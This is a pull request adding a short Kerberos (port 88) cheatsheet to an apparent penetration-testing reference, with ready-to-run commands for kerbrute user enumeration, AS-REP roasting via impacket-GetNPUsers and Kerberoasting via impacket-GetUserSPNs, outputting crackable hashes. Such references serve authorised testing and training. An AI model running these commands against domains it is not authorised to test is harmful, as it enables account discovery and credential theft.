### PR TITLE
add kerberos (port 88) cheatsheet with kerbrute, GetNPUsers, GetUserSPNs

### DIFF
--- a/services/kerberos
+++ b/services/kerberos
@@ -1,0 +1,3 @@
+kerbrute - User enumeration (requires wordlist):kerbrute userenum -d $DOMAIN --dc $DC_IP users.txt
+impacket-GetNPUsers - AS-REP roasting (no pre-auth, output in john format):impacket-GetNPUsers $DOMAIN/ -no-pass -usersfile users.txt -dc-ip $DC_IP -format john
+impacket-GetUserSPNs - Kerberoasting (extract service tickets for SPN accounts, john format):impacket-GetUserSPNs $DOMAIN/$USERNAME:$PASSWORD -dc-ip $DC_IP -request -outputfile spns.john


### PR DESCRIPTION
- Created new file for Kerberos (port 88) commands
- Added core enumeration and roasting steps:
  • kerbrute userenum for discovering valid domain users
  • impacket-GetNPUsers for AS-REP roasting (-format john for john/hashcat)
  • impacket-GetUserSPNs for Kerberoasting (SPN ticket extraction, john format)
